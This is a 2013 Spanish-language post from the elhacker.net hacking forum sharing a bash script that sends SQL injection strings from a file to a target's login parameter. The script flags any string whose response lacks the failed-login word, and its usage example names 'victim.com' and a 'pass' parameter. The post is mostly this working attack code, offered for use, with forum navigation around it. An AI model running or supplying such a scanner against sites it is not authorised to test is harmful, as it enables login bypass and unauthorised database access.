elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Escanner de sql injections
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Escanner de sql injections  (Leído 3,547 veces)
ireg

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Escanner de sql injections
« en: 27 Junio 2013, 20:01 pm »

Muy buenas! aver que les parece este programilla que prueba sql injection strings escritas en el archivo LIST (una por linea) y comprueba si la respuesta del servidor contiene <bad_boy_mssg>(4º parametro del programa), que es una palabra sacada del html de un intento fallido de loggin del servidor etc... si la respuesta del servidor no coniene <bad_boy_mssg> al probar una cadena de una linea de LIST esa linea puede estart modificando la sentencia sql entera y se saca por pantalla.

Código
  1. function start_scan () {
  2. while read line
  3. do
  4. injection=$(echo -n "$line" | \perl -pe's/([^-_.~A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg');
  5. url=$(echo "$1/$2?$3=$injection");
  6.  
  7. out=$(GET $url);
  8. found=1;
  9. for j in $out
  10. do
  11. if [ $j = $4 ]
  12. then
  13. found=0;
  14. fi
  15. done
  16.  
  17. if [ $found = 1 ]
  18. then
  19. echo "[ STRING FOUND: $line ]";
  20. fi
  21.  
  22. done <LIST
  23. echo "DONE";
  24. }
  25.  
  26.  
  27. if [ $# -lt 4 ]
  28. then
  29. echo "Usage:"; echo "";
  30. echo "LIST file must exist and contain de strings to inject";
  31. echo "";
  32. echo "RUNNING the scanner:------------------------------------------------------";
  33. echo "| bash scanner.bash <target> <injection_file> <parameter> <bad_boy_mssg> |";
  34. echo "--------------------------------------------------------------------------";
  35. echo "";
  36. echo "Example: bash scanner.bash victim.com index.php pass failed";
  37. echo "";
  38. echo "and the program will try victim.com/index.php?pass=...";
  39. echo "where ... are lines from LIST";
  40. else
  41. start_scan $1 $2 $3 $4;
  42. fi
  43.  
  44. exit 0
  45.  
« Última modificación: 27 Junio 2013, 20:03 pm por ireg » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
FILTRO AntiBATCH Injections 3.0 « 1 2 »
Scripting
carlitos.dll 16 9,044 Último mensaje 8 Agosto 2008, 07:39 am
por carlitos.dll
truquito para las sql injections
Nivel Web
fede_cp 7 4,255 Último mensaje 6 Octubre 2009, 15:25 pm
por fede_cp
SQL Injections Tools
Nivel Web
CloudswX 5 4,041 Último mensaje 2 Noviembre 2009, 20:39 pm
por OzX
ESCANNER ONLINE SIN QUE MANDE INFORMACION DE FIRMA?
Análisis y Diseño de Malware
VanHelsing810 2 3,185 Último mensaje 3 Diciembre 2014, 17:35 pm
por kub0x
Ataque SQLMAP INJECTIONS
Hacking
DroidZnet 0 1,711 Último mensaje 5 Mayo 2018, 08:04 am
por DroidZnet
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines